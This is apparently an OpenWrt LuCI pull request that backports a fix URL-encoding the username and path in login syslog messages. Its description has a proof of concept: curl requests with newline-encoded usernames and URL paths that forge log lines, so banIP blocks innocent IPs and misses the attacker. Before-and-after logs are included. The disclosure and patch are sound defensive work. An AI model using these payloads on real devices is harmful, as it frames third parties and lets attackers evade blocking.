### PR TITLE
[openwrt-24.10] luci-base: dispatcher.uc: escape URL path and username when logging

### DIFF
--- a/modules/luci-base/ucode/dispatcher.uc
+++ b/modules/luci-base/ucode/dispatcher.uc
@@ -10,7 +10,7 @@ import { rand } from 'math';
 import { hash, load_catalog, change_catalog, translate, ntranslate, getuid } from 'luci.core';
 import { revision as luciversion, branch as luciname } from 'luci.version';
 import { default as LuCIRuntime } from 'luci.runtime';
-import { urldecode } from 'luci.http';
+import { urldecode, urlencode } from 'luci.http';
 
 let ubus = connect();
 let uci = cursor();
@@ -503,13 +503,13 @@ function session_setup(user, pass, path) {
 			values: { token: randomid(16) }
 		});
 		syslog("info", sprintf("luci: accepted login on /%s for %s from %s",
-			join('/', path), user || "?", http.getenv("REMOTE_ADDR") || "?"));
+			join('/', map(path, p => urlencode(p))), urlencode(user || "?"), http.getenv("REMOTE_ADDR") || "?"));
 
 		return session_retrieve(login.ubus_rpc_session);
 	}
 
 	syslog("info", sprintf("luci: failed login on /%s for %s from %s",
-		join('/', path), user || "?", http.getenv("REMOTE_ADDR") || "?"));
+		join('/', map(path, p => urlencode(p))), urlencode(user || "?"), http.getenv("REMOTE_ADDR") || "?"));
 }
 
 function check_authentication(method) {


### PR DESCRIPTION
Prevent maliciously crafted login requests from polluting the logs.


(cherry picked from commit 4021b549d77bf197923aecb6329381304c99d34d)

This is a backport of https://github.com/openwrt/luci/pull/8768

This issue is more severe in version 24.10, as the printing of carriage return and line feed characters is permitted.

<!-- 

Thank you for your contribution to the LuCI repository.

/*************************************************************************/
/*   PLEASE READ THIS BEFORE CREATING YOUR PULL REQUEST (PR)   */
/*************************************************************************/

Review the Contributing Guidelines: https://github.com/openwrt/luci/blob/master/CONTRIBUTING.md
(Especially if this is your first time to contribute to this repo.)

MUST NOT:
- Add a PR from your *main* branch - instead, put it on a separate branch.
- Add merge commits to your PR - instead, rebase locally and force-push.

MUST:
- Increment any PKG_VERSION in the affected Makefile.
- Set to draft if this PR depends on other PRs as well (e.g. openwrt/openwrt).
- Have each commit subject line starting with '<package name>: title', and the title starting in lowercase, with a reasonable number of characters total.
- Have a commit comment as it cannot be empty, with a reasonable number of characters per line.
- Have each commit with a valid `Signed-off-by:` (S.O.B.) with a reachable email (GitHub noreply emails are not accepted).
	* Forgot? `git commit --amend ; git push -f`
	* Tip: use `git commit --signoff`

MAY:
- Your S.O.B. *may* be a nickname.
- Delete the *optional* entries in the checklist that do not apply.
- Skip a `<package name>: title` first line subject if the commit is for house-keeping or a chore.

-->

## Pull request details

### Description
<!-- Describe the changes proposed in this PR. -->

Although master `banip` solved the problem https://github.com/openwrt/luci/security/advisories/GHSA-r6hx-4f83-vp8m , 
in version 24.10, dispatcher.uc `syslog` is manually crafted, allowing malicious users to construct requests containing newlines and spaces, thus disabling the banip fix.
(In version 25.12, syslog has switched to the ucode log library implementation, and newline characters are replaced with spaces, so it is unaffected. https://github.com/openwrt/luci/commit/81692c6c382f079eda4974d72c091b992d270d13 )

POC:
```
curl 'http://192.168.31.1/cgi-bin/luci/' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cache-Control: max-age=0' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://192.168.31.1' \
  -H 'Referer: http://192.168.31.1/cgi-bin/luci/' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36' \
  --data-raw 'luci_username=root+from+222.22.2.2%0Anewline&luci_password=' \
  --insecure

curl 'http://192.168.31.1/cgi-bin/luci/admin/vpn/openvpn/basic/%20for%20root%20from%20111.111.1.1%0Anewline' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cache-Control: max-age=0' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://192.168.31.1' \
  -H 'Referer: http://192.168.31.1/cgi-bin/luci/' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36' \
  --data-raw 'luci_username=root+from+222.22.2.2%0Anewline&luci_password=' \
  --insecure

```

Log:
```
Wed Jul  1 17:07:02 2026 daemon.err uhttpd[5811]: [info] luci: failed login on / for root from 222.22.2.2
Wed Jul  1 17:07:02 2026 daemon.err uhttpd[5811]: newline from 192.168.31.34

Wed Jul  1 17:07:02 2026 daemon.err uhttpd[5811]: [info] luci: failed login on /admin/vpn/openvpn/basic/ for root from 111.111.1.1
Wed Jul  1 17:07:02 2026 daemon.err uhttpd[5811]: newline for root from 222.22.2.2
Wed Jul  1 17:07:02 2026 daemon.err uhttpd[5811]: newline from 192.168.31.34
```

If `banip` parses these logs, it will add 222.22.2.2 and 111.111.1.1 to the blacklist, but the actual attacker, 192.168.31.34, will be ignored.

Log after patch:
```
Wed Jul  1 17:27:38 2026 daemon.err uhttpd[5811]: [info] luci: failed login on / for root?from?222.22.2.2?newline from 192.168.31.34
Wed Jul  1 17:27:38 2026 daemon.err uhttpd[5811]: [info] luci: failed login on /admin/vpn/openvpn/basic/%20for%20root%20from%20111.111.1.1?newline for root?from?222.22.2.2?newline from 192.168.31.34
```

### Screenshot or video of changes _(if applicable)_
<!-- Insert your screenshot or video here. -->


### Maintainer _(preferred)_
<!-- You can find this by checking the history of the package Makefile. -->
@jow- <github-user>

---

## Tested on
<!-- You can find this by:
- looking at the footer on LuCI, 
- or using the following command: ubus call system board -->
**OpenWrt version:** OpenWrt 24.10.5 <!-- e.g. OpenWrt 25.12.2 (r32802-f505120278) -->
**LuCI version:** LuCI openwrt-24.10 branch <!-- e.g. LuCI openwrt-25.12 branch (26.100.49936~3cefdb7) -->
**Web browser(s):** Not related<!-- e.g. Chrome 147.0.7727.55, Safari 26.5 (21624.2.2) -->

---

## Checklist
<!-- Place an x inside each [ ] and remove the empty space to check each item off the list. 
They should look like this: [x], otherwise leave them as is. -->
- [x] This PR is not from my *main* or *master* branch :poop:, but a *separate* branch. :white_check_mark:
- [x] Each commit has a valid :black_nib: `Signed-off-by: <my@email.address>` row (via `git commit --signoff`).
- [x] Each commit and PR title has a valid :memo: `<package name>: title` first line subject for packages.
- [x] Incremented :up: any `PKG_VERSION` in the Makefile.
- [ ] _(Optional)_ Includes what Issue it closes (e.g. openwrt/luci#issue-number).
- [ ] _(Optional)_ Includes what it depends on (e.g. openwrt/packages#pr-number in sister repo).
